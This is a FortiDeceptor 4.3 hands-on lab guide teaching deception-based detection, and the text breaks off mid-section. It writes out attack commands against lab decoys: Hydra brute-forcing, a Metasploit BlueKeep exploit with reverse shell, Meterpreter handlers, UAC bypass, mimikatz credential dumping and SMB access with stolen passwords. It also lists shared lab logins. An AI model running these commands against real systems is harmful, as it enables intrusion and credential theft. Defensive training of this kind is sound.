
Threat Prevention and Detection with FortiDeceptor
FortiDeceptor 4.3.0 Hands on Labs v3

Introduction
FortiDeceptor allows organizations to rapidly create a fabricated deception network that lures attackers into revealing
themselves. FortiDeceptor serves as an early warning system by providing accurate detection that correlates an attacker's
activity details and lateral movement, indicating that a breach has happened. Threat intelligence gathered from the attacker
can be applied automatically to inline security controls to stop attacks before any real damage is done.
Participants who attend this workshop will learn how to:
• Deploy deception hosts to uncover attacker activity
• Use the anti-reconnaissance and anti-exploit engine to correlate events into incidents and campaigns, giving SecOps the information they need to act upon
• Take action on discovered threat actor activity by integrating with the Fortinet Security Fabric to quarantine compromised hosts before they can do further damage
The training agenda covers the following items:
1. FortiDeceptor initial configuration and deploying decoy VMs
2. Attack the network and detect lateral movement
3. Increasing the deception surface by deploying deception lures
4. Integration with the Security Fabric for mitigation automation

© Fortinet Inc. All Rights Reserved. 3


1. HoLs Topology and Access Details
1.1 General
• The FortiDeceptor training environment is a cloud platform hosted on FWS and can be accessed via FNDN. The
requirements for accessing the FortiDeceptor training platform are:
• Laptop / PC
• Internet connection
• FortiClient
• Web browser
• Putty client
• This lab was designed to assist you with the deployment and testing of the FortiDeceptor platform. However, if you have never used FortiDeceptor before, we recommend experimenting with the platform and the Administration Guide on your own before completing this lab.
• You can find the recommended FortiDeceptor product videos / OT attack simulation here:
FortiDeceptor 3.0
• FortiDeceptor Testing Guide Against OT-Windows-Linux Decoys: https://video.fortinet.com/products/fortideceptor/3.0
• FortiDeceptor & FortiSOAR – protecting the OT network
FortiDeceptor 3.3
• FortiDeceptor integration with FortiNAC: https://video.fortinet.com/products/fortideceptor/3.3
• FortiDeceptor Ransomware Detection
FortiDeceptor 4.0
• FortiDeceptor 4.0 What's New: https://video.fortinet.com/products/fortideceptor/4.0
• FortiDeceptor Attack Simulation Against OT Decoy: https://fortinet.egnyte.com/dl/hcM8BzUzBD (Password: vz6JCw6k)
FortiDeceptor 4.1
• FortiDeceptor 4.1 What's New: https://video.fortinet.com/products/fortideceptor/4.1
• FortiDeceptor for SAP: https://video.fortinet.com/products/fortideceptor/4.1/fortideceptor-for-sap
FortiDeceptor 4.2
• FortiDeceptor and FortiSIEM Deception Token: https://video.fortinet.com/products/fortideceptor/4.2
• Deception Technology - FortiDeceptor for IoT/OT Networks: https://video.fortinet.com/products/fortideceptor/4.2/deception-technology-fortideceptor-for-iot-ot-networks


1.2 FortiDeceptor Training Environment Topology
• The FortiDeceptor training environment topology will have the following components:
• FortiDeceptor Virtual appliance: Deploy deception decoys and lures
• FortiGate: Provides network segmentation, network routing, internet, and VPN access to the training environment
• Kali box: Attacker tools framework
• Windows 10: Windows endpoint for deception lure deployment



1.3 Accessing the FortiDeceptor training environment
To access the FortiDeceptor training environment, please follow the instructions below:
• SSL-VPN Access
Open your browser and access the link that was emailed to you from the FNDN system and use the credentials below:

• Link: https://<instance-name>.fortidemo.fortinet.com:10443
• Username: fortideceptor
• Password: FortiDeceptor12#

After successful authentication, you can view the portal that will allow you to access the FortiDeceptor lab components.
The SSL-VPN portal supports SSO, so all the devices should be logged in automatically. If you are prompted to provide
your credentials, use your VPN credentials for access.
The VPN user account can support two VPN end-users at the same time.
• FortiClient
We highly recommend you access the lab over FortiClient. If you do not have FortiClient, you can download a free trial here: https://www.fortinet.com/support/product-downloads#vpn
Install the client and add a new connection with the following parameters:

VPN: SSL-VPN
Connection Name: FDC
Remote Gateway: <instance-name>.fortidemo.fortinet.com
Customize Port: 10443
Client Certificate: None
Username: fortideceptor
Password: FortiDeceptor12#

The VPN user account can support two VPN end-users at the same time. You can access the VPN from your laptop/PC directly to the FortiDeceptor.



• Lab IPs

FortiDeceptor (HTTP/SSH): 192.168.1.100
  Username: fortideceptor
  Password: FortiDeceptor123$
Windows10 (RDP): 192.168.2.200
  Username: fortideceptor
  Password: FortiDeceptor12#
Kali (SSH/VNC): 192.168.2.201
  Username: fortideceptor
  Password: FortiDeceptor12#
  Sudo Password: FortiDeceptor12#


2. The FortiDeceptor Platform
2.1 FortiDeceptor Components
The FortiDeceptor management console manages and operates the whole platform, including deployment, configuration, alerting, analysis, and ecosystem integration.

FortiDeceptor offers a highly scalable 3-tier architecture that combines three levels of deception:
• Server/Endpoint Lures
• Medium Interaction Decoys (IoT/OT)
• High Interaction Decoys

Deception Lures can be deployed using existing infrastructure tools like AD GPO, MS SCCM, etc.

A single FortiDeceptor appliance can run 20 Deception VMs that support 480 IP addresses in total. Each IP address represents a single Decoy.

Deception VMs can be downloaded from the FortiDeceptor marketplace, and the end-user admin can also bring their own Gold Image and convert it to a Decoy using the FortiDeceptor Decoy Customization wizard.


2.2 FortiDeceptor Lures
The purpose of the FortiDeceptor Lure Package is to add breadcrumbs on real endpoints/servers and redirect an attacker to
engage with a Decoy instead of a real asset. A Deception Lure is typically distributed to real endpoints and servers on the
network to expand the deception surface.
When the FortiDeceptor Token Package is installed on a real Windows, Linux, or MAC endpoint, it increases the deception surface and redirects an attacker to engage with a Decoy instead of a real asset.

The current FortiDeceptor Token Packages are:
Windows: SMB, FTP, RDP, SSH, Cached Credentials, Fake network connections, HoneyDocs
Linux: SMB (SAMBA), RDP (xfreerdp), SSH
MAC: SMB (SAMBA), RDP (xfreerdp), SSH

Effective Deception Lure technology should support these key points:
• Deploy Deception Lure data and configurations where attackers collect information.
• The Deception Lure location must be invisible to end-users (without affecting endpoint functionality).
• The Deception Lure is accessible with user-level permissions. The attacker can access these lures early in the compromise activity and get detected, potentially reducing the privilege escalation attack time.
2.3 FortiDeceptor Decoys
FortiDeceptor creates a network of Decoys to lure attackers and monitor their activities on the network. When attackers
attack a Decoy, first, they generate an alert; second, their malicious activities are captured and analyzed in real-time to
generate a mitigation and remediation response and protect the network.
The current FortiDeceptor Decoys are:
Windows: Windows 7; Windows 10 (can be deployed as a gold image); Windows 2016 (deployed as a gold image); Windows 2019 (deployed as a gold image)
Linux: Ubuntu Desktop
IoT/OT: SCADA Decoy (11 OT protocols); Medical Decoy (PACS, DICOM, Infusion Pump)
VPN: Fortinet SSL-VPN (FGT60E, FGT100F, FGT1500D, FGT2000E, FGT3700D)
Platform Decoys: ERP, POS, GIT
IoT Decoys: Cisco router, HP printer, IP Camera
The current FortiDeceptor monitored services are:
• Windows: RDP, SMB, HTTP/S, DB (SQL)
• Linux: SSH, SAMBA, HTTP/S
• IoT/OT: HTTP, FTP, TFTP, SNMP, MODBUS, S7COMM, BACNET, IPMI, TRICONEX, GUARDIAN-AST, IEC104, ENIP, DNP3
• SSL VPN: HTTPS
• Platform: HTTP/S, GIT
• Medical: PACS, Telnet, FTP, DICOM
• IoT: SNMP, Telnet, HTTP/S, Jet-Direct, UPNP, CDP, RTSP

The current FortiDeceptor IP address capacity:
• A single FortiDeceptor appliance (HW/VM) can host up to 20 Deception VMs.
• A single Deception VM supports up to 24 IP addresses, meaning 24 Decoys (each IP represents a Decoy).
• A single FortiDeceptor appliance (HW/VM) can support up to 480 IP addresses.
• With 4 Decoys per segment on average, a single FortiDeceptor appliance (HW/VM) can support up to 128 segments (VLANs).


3. Hands on Labs Tasks
Lab: Tasks
Section 3, Admin Tasks (15 minutes): Prepare the lab environment.
Section 4, Network Reconnaissance Attacks (15 minutes): Act as a bad entity and discover elements of interest on the network segment, and use FortiDeceptor to analyze the incidents.
Section 4, Lateral Movement Detection: Expanding the Deception Surface (10 minutes): Learn how to expand the deception surface with Lure Deployment packages (tokens).
Section 4, Lateral Movement Detection: HoneyDocs Lure (10 minutes): Configure and test the deployment of HoneyDocs tokens and analyze incidents reported in FortiDeceptor.
Section 4, Decoy Engagement: Post Exploitation (10 minutes): Analyze decoy capture and records of the attacker's activities.
Sections 5, 6, 7, SQL Deception, Tomcat Deception, SIP Decoy (15 minutes): Configure, test and analyze the interaction with the SQL, Tomcat and/or SIP Decoy.
Sections 8, 9, 10, Network Attacks: SCADA Decoy (MODBUS), SCADA Decoy (IEC), IoT Decoys (10 minutes): Configure, test and analyze the interaction with the Modbus decoy.
Section 11, Outbreak Alerts for Recent Vulnerabilities (10 minutes): Configure, test and analyze the interaction with the Spring4Shell outbreak Decoy.
Section 12, Fabric Integration (10 minutes): Configure, test and analyze the remediation using FortiGate integration.
Section 13, Decoy Deployment: Configure how to deploy the Decoys required to complete the labs.
Section 14, Cleanup (5 minutes): At the end of the labs, please follow the steps as outlined in this section of the labs.
3 FortiDeceptor Initial Configuration
Before we start: PREPARATION
!!!Attention!!! READ THIS CAREFULLY:
Access the FortiDeceptor web management console via SSL-VPN (https://192.168.1.100). Ignore the fabric login option. In case you see static data regarding incidents, events and/or lure distribution, please reset the configuration first.

Just log in to the CLI using the same credentials as for the UI login and perform a data purge:
Run data-purge -a

After running the command, type 'y'; the FortiDeceptor unit will clean all data and reboot. This will take some time.
3. FortiDeceptor Management Console: Administrator Tasks
• Exercise: FortiDeceptor management console and configuration
In this exercise, we will familiarize ourselves with the FortiDeceptor management console and apply the initial configuration.

FortiDeceptor Administrator tasks:

1. Access the FortiDeceptor web management console via SSL-VPN (https://192.168.1.100).
2. Verify that FortiDeceptor has a valid license under the dashboard widget called System Information. Refresh the widget if needed. We have already added the license in the lab environment. On a brand-new deployment, you are required to register the license with FortiCloud and upload the license using the same widget.
3. It's OK if "FDN Download Server" and "Web Filtering Server" are in a yellow state after reboot. It takes some time until FortiDeceptor connects to the online servers and validates the correct status.
4. Navigate to the Deception > Deception OS menu and confirm that the Decoys win10v1, ubuntu16v2, ubuntu18v1, voipv1, outbreakv1 and scadav3 are initialized. On a brand-new appliance, you need to click Download next to each Decoy.
5. Navigate to the Deception > Deployment Network menu to add a deployment network where the Decoy VM will be deployed. A Deployment Network is a network segment where the Decoy will be deployed. It can be configured as either a VLAN or a subnet. The deployment network must be configured before the Decoy VM can be deployed.
6. Now we are going to create the deployment network for the Decoy deployment (192.168.2.0/24).
• Click on +Add New Vlan/Subnet.
• Configure the following settings:
Name: deploynet1
Interface: port2
VLAN ID: 0
Deploy Monitor IP/Mask: 192.168.2.100/24
Gateway: 192.168.2.1
ARP Protection: Unchecked (this is for ARP spoofing/poisoning detection)
Tag: any
7. In the latest v4.3, there's an option to test the deployment network (port2 in this case) to ensure that it's fit for decoy deployment. At the moment, this can only be done via the CLI:
a. Log onto the FortiDeceptor CLI either via the CLI icon on the top left of the GUI or by SSH directly into the FortiDeceptor.
b. Run test-deployment-network -iport2 -m00:00:00:00:00:00
c. You should see a message informing you that "The network on port2 is good for decoy deployment".


4. Attack the network and Detect Lateral Movement
4.1 Network Reconnaissance Attacks (before the lateral movement)
• Deploy the Windows Decoy and make sure it's up & running as described in section 13.1 (Windows Decoy Deployment). Please note that this may take some time.
• After successful deployment, the "Decoy Status" view should show the decoy as running.

We are now going to switch roles and become the attacker. We are going to do some active reconnaissance and scan for open ports to find any interesting services. We are then going to try to use these services to infiltrate the network.

Find Running Services

We are going to use Nmap, a network scanner, to discover services running on the network IP range 192.168.2.0/24. Nmap is an open-source utility used to discover hosts and services on a computer network by sending packets and analyzing the responses. Nmap provides several features for probing computer networks, including host discovery and service and operating system detection.


To find running services:
1. Access Kali using your putty client at address 192.168.2.201 or through the SSL-VPN portal.
2. Log in with your username and password.
3. Run the Nmap command pointing to the Win10 Decoy IP:
@kali:~$ nmap -F -sV -Pn 192.168.2.11

Nmap options:
• -F specifies a fast scan of the top 100 common ports.
• -sV probes any open ports to determine their service/version information. The version information can be useful to look up whether there are any known vulnerabilities for the service.
• -Pn disables host discovery using ICMP.


Viewing events
FortiDeceptor creates a network of Decoy VMs to lure attackers and monitor their activities. Once attackers attack Decoy VMs, their actions are analyzed to protect the network.
We are now going to switch back to being the FortiDeceptor administrator.
1. Return to the FortiDeceptor web console.
2. Go to Incident > Analysis.
3. Set the "Show" filter to "All".

You should see an incident with the Attacker IP (192.168.2.201), Victim IP (192.168.2.x), and Victim Port(s).
FortiDeceptor has the concept of Events, Incidents, and Campaigns.

An Event can be, for example, the opening or closing of a port. Incidents are made up of connected Events. Campaigns are then made up of connected Incidents. Here we can see the four events caused by the Nmap scan, which make up the Incident: the port is opened, a connection is established, a command is executed, and the port is closed.
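The Event, Incident and Campaign grouping described above, as an added illustration that is not FortiDeceptor's own code: a small correlator that groups constructed decoy events by attacker/victim pair into incidents, splitting on an idle gap, and rolls all incidents from the same attacker into a campaign. The event fields, the 10-minute idle gap and the sample events are assumptions.

```python
"""Toy Event -> Incident -> Campaign correlator modelled on the FortiDeceptor
concept above. Added example: record layout, idle gap and sample data are
assumptions, not FortiDeceptor internals."""
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    ts: datetime
    attacker: str   # source IP seen by the decoy
    victim: str     # decoy IP
    port: int       # decoy port touched
    action: str     # port_open | connected | command | port_close


@dataclass
class Incident:
    attacker: str
    victim: str
    events: list = field(default_factory=list)

    @property
    def ports(self):
        return sorted({e.port for e in self.events})

    @property
    def ended(self):
        return self.events[-1].ts


def correlate_incidents(events, idle_gap=timedelta(minutes=10)):
    """Connected events = same attacker/victim pair with no pause longer
    than idle_gap between consecutive events (assumed threshold)."""
    incidents = []
    active = {}  # (attacker, victim) -> most recent Incident for that pair
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.attacker, ev.victim)
        cur = active.get(key)
        if cur is None or ev.ts - cur.ended > idle_gap:
            cur = Incident(ev.attacker, ev.victim)
            incidents.append(cur)
            active[key] = cur
        cur.events.append(ev)
    return incidents


def build_campaigns(incidents):
    """Connected incidents = every incident driven by the same attacker IP,
    whichever decoys it touched."""
    campaigns = defaultdict(list)
    for inc in incidents:
        campaigns[inc.attacker].append(inc)
    return dict(campaigns)


def summarize(campaigns):
    """One line per campaign, in the shape an analyst would want to read."""
    lines = []
    for attacker, incs in campaigns.items():
        victims = sorted({i.victim for i in incs})
        lines.append(f"{attacker}: {len(incs)} incident(s) against {', '.join(victims)}")
    return lines


def _burst(start, attacker, victim, port, actions):
    return [Event(start + timedelta(seconds=i), attacker, victim, port, a)
            for i, a in enumerate(actions)]


T0 = datetime(2023, 1, 1, 10, 0, 0)
SCAN = ("port_open", "connected", "command", "port_close")  # the four events the text lists
# Constructed sample: Kali probes the Win10 decoy's RDP and SMB ports, an hour
# later touches the SQL decoy, and two hours later returns to RDP on the Win10 decoy.
SAMPLE_EVENTS = (
    _burst(T0, "192.168.2.201", "192.168.2.11", 3389, SCAN)
    + _burst(T0 + timedelta(seconds=5), "192.168.2.201", "192.168.2.11", 445, SCAN)
    + _burst(T0 + timedelta(hours=1), "192.168.2.201", "192.168.2.16", 3306, SCAN[:3])
    + _burst(T0 + timedelta(hours=2), "192.168.2.201", "192.168.2.11", 3389, ("connected",) * 5)
)

if __name__ == "__main__":
    for line in summarize(build_campaigns(correlate_incidents(SAMPLE_EVENTS))):
        print(line)
```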
An attacker that finds the RDP port (3389) open will try to obtain a username and password by running a brute-force attack, or run an exploit against the service to get a remote shell.

The attacker will use Hydra, which is a brute-force password cracking tool. Hydra can use both username and password lists to determine the correct login credentials needed to access a service.

From the Kali terminal window, run the following command:

@kali:~$ hydra -V -f -l hydra-test -P /usr/share/metasploit-framework/data/wordlists/default_pass_for_services_unhash.txt rdp://192.168.2.11 -t 1


FortiDeceptor will detect this attack, and all the attack alerts will be listed under the incident analysis section (Incident > Analysis).
Note: Toggle the Show dropdown box to view different events.


Probing the network for outdated OS
An additional network reconnaissance method is to probe the network for outdated operating systems using Nmap, and then run a newer exploit against them.
The following command attempts to discover the OS of every host on the network:
@kali:~$ sudo nmap -O 192.168.2.1-254


In this role play, following the lab, we discovered through reconnaissance that there is a Win10 host with the RDP service open on the network with IP address 192.168.1.12.
If we act as an attacker, what is our next step?
• Run a new exploit that affects most Windows versions to get a remote shell. We will use Metasploit to run remote code execution against an RDP vulnerability.
fortideceptor@kali:$ msfconsole
msf6 > use windows/rdp/cve_2019_0708_bluekeep_rce
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RHOSTS 192.168.2.11 (Windows Decoy)
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set RDP_CLIENT_IP 192.168.2.201 (Kali Machine)
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set payload generic/shell_reverse_tcp
msf6 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit -f


4.2 Lateral movement Detection: Expanding the attack surface
Use Case - Lateral movement detection using Windows Lure (Token) Packages
Let's assume the attacker obtained a remote shell on a real desktop inside the network via a spear phishing attack and started to move laterally based on information collected from the infected endpoint.
We will deploy a Deception Lure on the infected endpoint and run a malicious file that gives the attacker backdoor access (a Meterpreter session).
To deploy a Deception Lure on an infected endpoint:
1. Go to Deception Token and click on the +Campaign button to create a new Token Package.
2. Use the following settings to create the Token package and press Save.

Campaign Name: WIN
Mode: Online
Lure Types: Check RDP and Check SMB for the Windows Decoy


3. Go to the Windows desktop at the IP address 192.168.2.200 using the RDP client with your credentials or through the SSL-VPN web portal.
4. From the Windows desktop, access FortiDeceptor via Chrome (bookmark for 192.168.1.100) using the known credentials.
a. Go to the Deception Token menu.
b. Download the Deception Lure for the Windows 10 decoy to the Windows desktop.


5. Unzip the file on the Windows desktop.
6. Open the Windows directory and run the file windows_token.exe to deploy the deception lures.
7. After installation of the Tokens, verify on FortiDeceptor > Deception > Deception Token > Token Deployment Status that the workstation has successfully laid the "breadcrumbs". As we use "online" Tokens, you can change the Tokens at any time and FDC will upload the changes to the workstation.


8. Access the Kali box at the IP address 192.168.2.201 with your credentials.
9. After you access the Kali box, run the Metasploit tool (as root using sudo):
fortideceptor@kali:~$ sudo msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.2.201
msf6 exploit(multi/handler) > set LPORT 4443
msf6 exploit(multi/handler) > exploit

Go back to the Windows desktop and run the file office.exe in the My Documents directory.
You should now have a backdoor session from the Kali box to the Windows desktop machine, called Meterpreter. This allows you to load the attacker framework and get full access to the Windows OS and extract information such as saved passwords, network details, and more.
The Deception Lure expands the attack surface and provides fake information and credentials to the threat actor, deceiving the malicious activity into engaging with a fake asset instead of a real one.

Exercise: Collect information from an infected machine

In this exercise, we will use the Meterpreter backdoor to collect information from the infected machine, find and decrypt the saved passwords in the Windows credential manager, and use them to move laterally.
Once the endpoint is compromised, the threat actor will use non-malicious commands and tools to collect information without generating any security alerts. At this stage, our deception technology will detect the attack early in the chain.
To collect information from an infected machine:
1. In the Meterpreter session, run the following commands to simulate the threat actor's collection activity.

meterpreter > arp
This command displays the endpoint ARP table. The network connection deception lure injects a static ARP entry that points to a Decoy. The attacker analyzes the ARP table and "learns" about a new network. If the attacker tries to access the new IP from the ARP table, it leads to a decoy engagement that generates an alert.

meterpreter > show_mount
This command presents the infected endpoint's local drive and the attached network drive. The attacker enters the drives to find sensitive files and learn from the files about the endpoint owner (financial, HR, R&D, role, etc.). If the attacker enters the fake network drive, it leads to a decoy engagement that generates an alert.

meterpreter > getsystem
You will notice that you are missing the privileges to get system information. You also do not have enough permissions to read the credential manager to extract usernames and passwords. We need to take additional steps…

2. Let's continue the attack; we need to gain administrative privileges by running an escalation exploit.

meterpreter > ps -A x64
Shows x64 processes. Select one of the svchost processes and note its PID.

meterpreter > migrate <PID>
Moves the session into the selected x64 process.

meterpreter > background
Moves the backdoor session to the background to run more commands from the Metasploit console.
3. To continue the attack, we need to gain administrative privileges by running a privilege escalation exploit.
msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac_sdclt
msf6 exploit(windows/local/bypassuac_sdclt) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_sdclt) > set SESSION 1
msf6 exploit(windows/local/bypassuac_sdclt) > set LHOST 192.168.2.201
msf6 exploit(windows/local/bypassuac_sdclt) > set LPORT 4443
msf6 exploit(windows/local/bypassuac_sdclt) > exploit

After the attack you will end up in the Meterpreter console again.

4. Now we have the privileges needed to run the next commands.

meterpreter > getsystem
Privilege escalation.
meterpreter > load kiwi
Loads the mimikatz tool.
meterpreter > kiwi_cmd sekurlsa::credman
Dumps the Windows credential manager passwords.
Now that the threat actor has dumped the infected endpoint's passwords from the Windows credential manager, the stolen credentials will be used for lateral movement.
In this example we got:
Username: Windows10\matthew > SMBUser
Domain: 192.168.2.11 > RHOST
Password: iloveyou > SMBPass

In your case it will be a different login, as the decoy credentials are randomly generated.
5. Stop the Metasploit tool and use the SMB client on the Kali box to access 192.168.2.11 via SMB using the extracted credentials.
• Exit Metasploit:
msf6 exploit(windows/local/bypassuac_sdclt) > exit -y

• Perform SMB login using the previously obtained credentials (matthew//iloveyou):
@kali:~$ smbclient -U matthew -L 192.168.2.11


• Once we have a share name, we can access the share using the following command:
@kali:~$ smbclient //192.168.2.11/matthew03-26-2020 -U\matthew
smb:\> ?
smb:\> ls

When we connect to the share, it is easy to manipulate the files using the available options, for example downloading a file:
smb:\> get Leave_Notice_PTO.docx

In this case, the credentials provide access to the Windows endpoint and present the existing network shares that the credentials can access, but even at this early stage of the attack, FortiDeceptor will generate a security alert on the network drive access.
Note
In the current 4.3 release we have identified a software anomaly with Windows SMB lures that prevents Incident Analysis logs from being displayed. This will be resolved in the coming release.


4.3 Lateral Movement Detection: HoneyDocs Lure
Use Case - Lateral movement detection using Linux Lure (Token) Package HoneyDocs
In this exercise, we will create and deploy a Linux-based HoneyDocs Deception Lure Package (token) on the Windows device (real endpoint). The FortiDeceptor token package will be used to add breadcrumbs on real endpoints and lure an attacker to a Linux-based Decoy VM. Tokens are normally distributed within real endpoints and other IT assets on the network to maximize the deception surface.
Note:
Before we start this exercise, please deploy the Linux Decoy as described in Section 13.2 of this guide (Linux Decoy Deployment).

To deploy a Deception Lure on an infected endpoint:
1. Go to Deception Token and click on the +Campaign button to create a new Token Package.


2. Use the following settings to create the Token package and press Save.

Campaign Name: HoneyDocs
Mode: Online
Lure Types: Check HoneyDoc for the Linux Decoy
Installation Path: Defaults to the Recent folders; you may specify the path you intend. (In this exercise, you may use %user%\Downloads)

3. Go to the Windows desktop at the IP address 192.168.2.200 using the RDP client with your credentials or through the SSL-VPN web portal.
4. From the Windows desktop, access FortiDeceptor via Chrome (bookmark for 192.168.1.100) using the known credentials.
a. Go to the Deception Token menu.
b. Download the Deception Package (token) for the HoneyDocs Lure to the Windows desktop.
5. Unzip the file.
6. Open the Windows directory and run the file windows_token.exe to deploy the deception lures.
7. Once the lure is successfully deployed, you should notice that fake content was created under the Downloads directory. Make sure that the "view hidden files" option is checked.

Note: During HoneyDocs Token package installation, an existing token package is automatically uninstalled.


8. You may also view the Token Deployment Status under Deception Token.

9. Browse to the Downloads folder and open any of the PDFs. Allow the pop-up asking to allow the connection.


10. Now, check the campaign details. You should notice an alert generated from the Windows machine to the Linux decoy with the web service enabled. When you open the document on the real endpoint, the file generates a web connection to the web server on the Linux decoy.
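The HoneyDoc beacon just described, seen from the decoy's side, as an added example that is not FortiDeceptor's code: it parses access-log lines from the decoy web server, matches beacon paths against a constructed inventory of which token was planted on which endpoint, and rates a beacon from any other source higher, since that means the document has left the host it was planted on. The log format, the /hd/<token> path scheme, the inventory and the severities are all assumptions.

```python
"""Attribute HoneyDoc beacons on a decoy web server to the endpoint the
document was planted on. Added example; the combined-style log format,
the /hd/<token> beacon path and the inventory are assumptions."""
import re
from dataclasses import dataclass

LOG_RE = re.compile(
    r'^(?P<src>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumed scheme: each planted document requests /hd/<8 hex chars>
BEACON_RE = re.compile(r"^/hd/(?P<token>[0-9a-f]{8})(?:[/?].*)?$")

# Constructed inventory: token -> (endpoint the package was deployed to, file name)
DEPLOYED = {
    "3fa21c0e": ("192.168.2.200", "Q3_Budget_Draft.pdf"),
    "9b7d4410": ("192.168.2.200", "Salary_Review.pdf"),
}


@dataclass(frozen=True)
class Alert:
    src: str
    token: str
    filename: str
    planted_on: str
    severity: str  # medium: opened where planted; high: opened elsewhere; low: unknown token


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def alerts_from_log(lines, inventory=DEPLOYED):
    """Turn beacon hits into alerts. Non-beacon requests (ordinary recon of
    the decoy web root) are ignored here; the decoy reports those separately."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        b = BEACON_RE.match(rec["path"])
        if b is None:
            continue
        token = b.group("token")
        if token not in inventory:
            alerts.append(Alert(rec["src"], token, "?", "?", "low"))
            continue
        planted_on, fname = inventory[token]
        # The document beaconing from a different host than the one it was
        # planted on means it was copied or exfiltrated: the strongest signal.
        severity = "medium" if rec["src"] == planted_on else "high"
        alerts.append(Alert(rec["src"], token, fname, planted_on, severity))
    return alerts


# Constructed sample log: the lab's Windows endpoint opens a planted PDF, an
# outside host opens another copy, and Kali pokes at the web root and a bogus token.
SAMPLE_LOG = [
    '192.168.2.200 - - [01/Jan/2023:10:05:12 +0000] "GET /hd/3fa21c0e?v=1 HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
    '10.20.30.40 - - [01/Jan/2023:11:42:03 +0000] "GET /hd/9b7d4410 HTTP/1.1" 200 43 "-" "Mozilla/5.0"',
    '192.168.2.201 - - [01/Jan/2023:10:07:55 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '192.168.2.201 - - [01/Jan/2023:10:08:01 +0000] "GET /hd/deadbeef HTTP/1.1" 404 0 "-" "curl/7.88"',
]

if __name__ == "__main__":
    for a in alerts_from_log(SAMPLE_LOG):
        print(f"[{a.severity}] {a.src} opened {a.filename} (token {a.token}, planted on {a.planted_on})")
```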


4.4 Decoy Engagement: Post Exploitation
Use Case – Monitoring and Analyzing Attacker's Activity
Assuming the attacker obtained a remote shell on the Decoy, let's see how the Decoy captures, records and analyzes the attacker's activities on the Decoy.

SSH Access to Linux-Decoy

1. Open the putty client and connect to the Linux Decoy over SSH.
2. Get the SSH username and password for the Linux Decoy from the "Decoy Status" overview by clicking on the button which opens a detail window.
3. Run several commands such as:
@ubuntu16v1:~$ ls
@ubuntu16v1:~$ ping 8.8.8.8
@ubuntu16v1:~$ wget www.google.com
@ubuntu16v1:~$ mkdir test
@ubuntu16v1:~$ nano test.txt
Note: fill the file with content and save the file.
4. Access the Incident Analysis section and open the alert to see whether all of the attacker's activities were recorded and analyzed.
RDP Access to Windows Decoy
1. Open the RDP client and connect to the Decoy over RDP. (Note: RDP doesn't work well with the SSL-VPN web portal.)
2. Get the RDP username and password from the "Decoy Status" overview by clicking on the button which opens a detail window.
3. Open the command line and run several commands such as:
ping 8.8.8.8
net user
dir

4. Open a browser and access the website https://wfurltest.fortiguard.com .

Note - This is the end of the Windows and Linux Decoy use cases; please delete the Win10 and Linux decoys.


5. SQL Deception
5. Probing the SQL Decoy
• Deploy SQL Decoy and make sure it’s up & running as described in section 13.7 (SQL Decoy Deployment). Please note
that may take some time.
• After successful deployment, the status the “Decoy Status” should be like:

Probing the SQL Decoy


To verify the SQL Decoy has been successfully deployed, use nmap to check the MySQL service is activated on the
targeted system or not with the following command;
@kali:~$ nmap -sT –Pn 192.168.2.16

You should notice that the service is active on the default port 3306, as in the example below.

With port 3306 open for the MySQL service (note: MariaDB is a fork of MySQL), let's enumerate it with the following command; we should be able to retrieve MySQL information such as the version and protocol:
@kali:~$ nmap --script=mysql-info 192.168.2.16

By now, you should notice that an incident was triggered. Browse to Incident > Analysis and you should see multiple Reconnaissance Events from the Kali Linux machine to the SQL-Decoy.


You may also generate some Interactive Events by connecting to the database hosted on the SQL-Decoy. Use any of the generated lure users to connect to the database, like below:
fortideceptor@kali:~$ mysql -u <username> -p -h 192.168.2.16 CustomerDB

Once the connection is successful, issue multiple database commands (e.g. 'show tables;' or 'show databases;').

Browsing back to the FortiDeceptor dashboard > Incident > Interaction, you should notice the connection to the MySQL database and also the queries executed by the attacker.


Note - This is the end of the SQL-Decoy use case; please delete the SQL decoy.



6. Tomcat Deception
6. Probing the Tomcat Decoy
• Deploy the Tomcat Decoy and make sure it is up and running as described in section 13.6 (Tomcat Decoy Deployment). Please note that this may take some time.
• After successful deployment, the entry under "Decoy Status" should look like this:

Probing the Tomcat Decoy


To verify that the Tomcat Decoy has been successfully installed, open the browser on the Windows device (192.168.2.200) and browse to the decoy IP and port (http://192.168.2.15:8080). The welcome page will be displayed.

• Browsing back to the FortiDeceptor dashboard > Incident > Interaction, you should notice the browsing activity from the attacker to the decoy.

Note - This is the end of the Tomcat-Decoy use case; please delete the Tomcat-Decoy.



7. SIP Decoy
7. Probing the SIP Decoy
• Deploy the SIP Decoy and make sure it is up and running as described in section 13.9 (SIP Decoy Deployment). Please note that this may take some time.
• After successful deployment, the entry under "Decoy Status" should look like this:

Network Discovery
Discover the network using nmap. From the Kali Linux CLI:
fortideceptor@kali:~$ nmap 192.168.2.0/24

The result should list the SIP decoy as a SIP server on the network.

Log in to FortiDeceptor and find the Reconnaissance Events. Try to find the port scanning activity identified by the ARAE Engine.

Use the Metasploit framework scanner to identify the SIP server type and version.
fortideceptor@kali:~$ msfconsole
msf6 > use auxiliary/scanner/sip/options
msf6 auxiliary(scanner/sip/options) > show options
msf6 auxiliary(scanner/sip/options) > set RHOSTS 192.168.2.18
msf6 auxiliary(scanner/sip/options) > run

On FortiDeceptor, under Incident > Analysis, find the Interaction incident.


Note the following:
• Function used: OPTIONS
• Version of the SIP server: 2.0
• Username used: nobody (the same username used in the scanner options)

SIP user enumeration
